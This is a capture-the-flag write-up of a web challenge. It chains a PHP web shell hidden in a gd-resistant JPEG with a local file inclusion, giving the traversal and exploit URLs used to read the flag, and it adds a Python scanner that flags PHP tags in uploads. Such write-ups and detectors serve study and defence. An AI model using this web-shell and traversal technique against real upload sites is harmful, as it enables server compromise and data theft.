Titanoreine was a funny challenge. We were provided a website where we could upload some pictures. There was also an obvious LFI. One may think that you just have to put some php like <?php system($_GET['c']);?> into the metadata field to get code execution. The twist here was that the image was processed by php-gd, trashing our precious metadata.
Notfound, from the hexpresso team, reminded me that one of the organizers was virtualabs. I vaguely remembered that he wrote an article about transformation-resistant pictures to get a php shell. He even provides a script to generate the images. What a coincidence.
First we tried to use the system command in our payload, but it seemed that it was not authorised. We switched to eval. By the way, thank you php for providing so many functions to get code execution.
Here is the image that we used. The payload is roughly equivalent to <?php system($_GET['c']);?>.
Feel free to transform it with php-gd with a quality of 98 (The one used by the chall. By the way, thanks to the teams that used the exploit-98.jpg filename for the hint ;) ) to see our payload with your favorite hex editor.
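The defensive lesson of this challenge is that php-gd re-encoding does not sanitise an upload, so a gallery that later includes the file has to check for embedded PHP in the bytes it actually stores and serves (the re-encoded output, not just the raw upload). The following scanner is an added example written for this write-up, not code from the challenge or from virtualabs' article. It builds two constructed JPEG-like blobs (a minimal JFIF header plus a COM segment, one benign and one carrying the payload quoted above) and scans for PHP open tags and common code-execution calls; the regexes and the `inspect_upload` helper are my own heuristic, and the only real fix for the LFI itself is to never include a user-controlled path.

```python
import re

# PHP open tags. "<?php" and "<?=" are high-confidence; a bare "<?" followed
# by whitespace is only meaningful if short_open_tag is enabled on the target,
# and the two bytes 0x3C 0x3F can occur by chance in compressed image data.
PHP_TAG_RE = re.compile(rb"<\?php\b|<\?=|<\?\s")

# Functions commonly used to turn a string into code execution (the write-up
# notes that system() was blocked and eval() was used instead).
DANGEROUS_CALL_RE = re.compile(
    rb"\b(eval|system|passthru|shell_exec|exec|assert|popen|proc_open)\s*\("
)


def find_php_tags(data: bytes) -> list[tuple[int, bytes]]:
    """Return (offset, matched tag) for every PHP open tag found in data."""
    return [(m.start(), m.group(0)) for m in PHP_TAG_RE.finditer(data)]


def find_dangerous_calls(data: bytes) -> list[tuple[int, bytes]]:
    """Return (offset, function name) for every suspicious call found in data."""
    return [(m.start(), m.group(1)) for m in DANGEROUS_CALL_RE.finditer(data)]


def inspect_upload(data: bytes) -> dict:
    """Scan an uploaded or re-encoded image and decide whether to reject it.

    Any PHP open tag is enough to reject: an image never legitimately needs
    one, and a file that survives gd processing with a tag intact is exactly
    the case this challenge exploited. Dangerous calls are reported as extra
    context for the person triaging the alert.
    """
    tags = find_php_tags(data)
    calls = find_dangerous_calls(data)
    return {"php_tags": tags, "dangerous_calls": calls, "reject": bool(tags)}


# Constructed sample inputs (not the image used in the challenge): a minimal
# JFIF header followed by a COM (0xFFFE) comment segment and an EOI marker.
def _jpeg_with_comment(comment: bytes) -> bytes:
    soi_app0 = (
        b"\xff\xd8"                      # SOI
        b"\xff\xe0\x00\x10JFIF\x00"      # APP0, length 16, identifier
        b"\x01\x01\x00\x00\x01\x00\x01"  # version 1.1, no density units, 1x1
        b"\x00\x00"                      # no thumbnail
    )
    com = b"\xff\xfe" + (len(comment) + 2).to_bytes(2, "big") + comment
    return soi_app0 + com + b"\xff\xd9"  # EOI


CLEAN_IMAGE = _jpeg_with_comment(b"Created with some camera")
INFECTED_IMAGE = _jpeg_with_comment(b"<?php system($_GET['c']);?>")


if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_IMAGE), ("infected", INFECTED_IMAGE)):
        print(name, inspect_upload(blob))
```

In a real gallery you would run `inspect_upload` on the bytes php-gd wrote back to disk, since that is the file the LFI can include; rejecting on the raw upload alone is what the challenge's transformation-resistant image is designed to get past.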
We lost quite some time trying to get this kind of url working:
http://gallery.nuitduhack.com/index.php?lang=../../../includes/ble.jpg?c=echo 1;
Here is the correct form:
http://gallery.nuitduhack.com/index.php?c=echo 1;lang=../../../includes/ble.jpg
or
http://gallery.nuitduhack.com/index.php?lang=../../../includes/ble.jpg&c=echo 1;
This was the "Omg plz kill me" moment of the ctf.
Anyway, we used glob and file_get_contents to get the flag.
Here is our final payload: http://gallery.nuitduhack.com/index.php?c=echo%20file_get_contents%28%27./includes/X~unsuspicious~X%27%29;&lang=../../../includes/ble.jpg
flag: WhyAreHemorrhoidsNotCalledAssteroids